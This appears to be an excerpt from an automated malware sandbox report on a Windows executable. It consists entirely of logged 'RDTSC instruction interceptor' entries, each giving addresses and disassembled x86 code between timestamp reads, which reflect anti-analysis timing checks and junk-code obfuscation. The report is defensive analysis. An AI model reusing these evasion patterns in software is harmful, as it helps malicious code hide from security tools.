              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAAA9 second address: BBAAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBABFD second address: BBAC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B877D5 second address: B877D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B877D9 second address: B877E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8934532D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B877E8 second address: B877EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBFD8C second address: BBFD91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC02BB second address: BC02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC02BF second address: BC02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC02C5 second address: BC02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEB57 second address: BBEB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEB5B second address: BBEB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC03D0 second address: BC03D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0555 second address: BC055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC055A second address: BC055F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6030 second address: BC6038 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6038 second address: BC603D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC603D second address: BC6045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6045 second address: BC6063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8934532D0Eh 0x0000000d jc 00007F8934532D12h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6063 second address: BC6069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC648F second address: BC64AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D12h 0x00000007 jo 00007F8934532D0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC65E9 second address: BC65F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F893453D386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC65F3 second address: BC6617 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8934532D06h 0x00000008 jmp 00007F8934532D16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6617 second address: BC662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D393h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC662E second address: BC6634 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6634 second address: BC663A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC663A second address: BC666B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8934532D0Eh 0x00000008 js 00007F8934532D06h 0x0000000e jmp 00007F8934532D0Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F8934532D06h 0x0000001c jne 00007F8934532D06h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC85F4 second address: BC85FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC85FA second address: BC85FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC85FE second address: BC8604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89244 second address: B89248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89248 second address: B8924E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8924E second address: B89254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89254 second address: B8925E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F893453D38Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8925E second address: B8926D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9252 second address: BC9258 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9258 second address: BC9284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007F8934532D06h 0x00000013 jo 00007F8934532D06h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9413 second address: BC9438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F893453D39Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F893453D386h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99E6 second address: BC99EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99EB second address: BC9A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D392h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9A0B second address: BC9A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9A11 second address: BC9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B83 second address: BC9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9C77 second address: BC9C9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F893453D386h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F893453D394h 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9F98 second address: BC9F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9F9C second address: BC9FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9FA2 second address: BC9FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA0B0 second address: BCA0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA0B4 second address: BCA0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA154 second address: BCA17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, ecx 0x0000000b xchg eax, ebx 0x0000000c jnl 00007F893453D38Ah 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F893453D38Fh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAFEF second address: BCAFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAFF4 second address: BCB017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB017 second address: BCB01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB01C second address: BCB022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB022 second address: BCB026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB026 second address: BCB05A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b movsx edi, si 0x0000000e push 00000000h 0x00000010 or dword ptr [ebp+122D2BA8h], ecx 0x00000016 jmp 00007F893453D397h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB05A second address: BCB05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB05E second address: BCB064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB064 second address: BCB07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8934532D0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC070 second address: BCC075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC075 second address: BCC0AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1885h], ecx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+12471EB1h], ebx 0x0000001c push eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f jl 00007F8934532D06h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCA6B second address: BCCAD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D393h 0x00000012 popad 0x00000013 pop eax 0x00000014 nop 0x00000015 push ecx 0x00000016 sub edi, 35816077h 0x0000001c pop esi 0x0000001d sub dword ptr [ebp+12456846h], edi 0x00000023 push 00000000h 0x00000025 sub edi, 0BFD5AE4h 0x0000002b mov edi, dword ptr [ebp+122D3693h] 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F893453D393h 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F893453D38Dh 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD45F second address: BCD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD465 second address: BCD469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD469 second address: BCD46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDE5 second address: BCDDF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDF9 second address: BCDE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE03 second address: BCDE80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F893453D388h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 pushad 0x0000002a and esi, dword ptr [ebp+122D2910h] 0x00000030 add eax, dword ptr [ebp+122D1946h] 0x00000036 popad 0x00000037 mov di, CD1Fh 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D26A0h], edi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F893453D388h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f or dword ptr [ebp+122D199Dh], ebx 0x00000065 jnc 00007F893453D38Ch 0x0000006b push eax 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE80 second address: BCDE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE84 second address: BCDE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD1B4 second address: BCD1D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826D3 second address: B826D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09D4 second address: BD09E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09E4 second address: BD09EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09EA second address: BD09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09EE second address: BD0A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F893453D388h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov si, cx 0x00000026 sub dword ptr [ebp+1244CD26h], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F893453D388h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D27B4h] 0x0000004e mov dword ptr [ebp+1246E6F2h], eax 0x00000054 push 00000000h 0x00000056 movzx edi, dx 0x00000059 xchg eax, ebx 0x0000005a jl 00007F893453D392h 0x00000060 jl 00007F893453D38Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD475F second address: BD4763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4D0A second address: BD4D17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE61B second address: BCE62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8934532D0Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCF0CF second address: BCF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE62C second address: BCE630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD126E second address: BD1273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1273 second address: BD128E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D0Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD128E second address: BD1294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8B67 second address: BD8BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F8934532D08h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 pushad 0x00000026 movsx eax, bx 0x00000029 jmp 00007F8934532D0Fh 0x0000002e popad 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+1244D2D2h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F8934532D08h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push eax 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8BDC second address: BD8BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E7F second address: BD4E89 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E89 second address: BD4E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E8F second address: BD4E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E93 second address: BD4EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D399h 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAACB second address: BDAAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAAD0 second address: BDAB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F893453D396h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e or di, DB90h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 sub ebx, 1E2F7144h 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F893453D388h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 jmp 00007F893453D38Bh 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jg 00007F893453D386h 0x00000048 jg 00007F893453D386h 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB3D second address: BDAB47 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
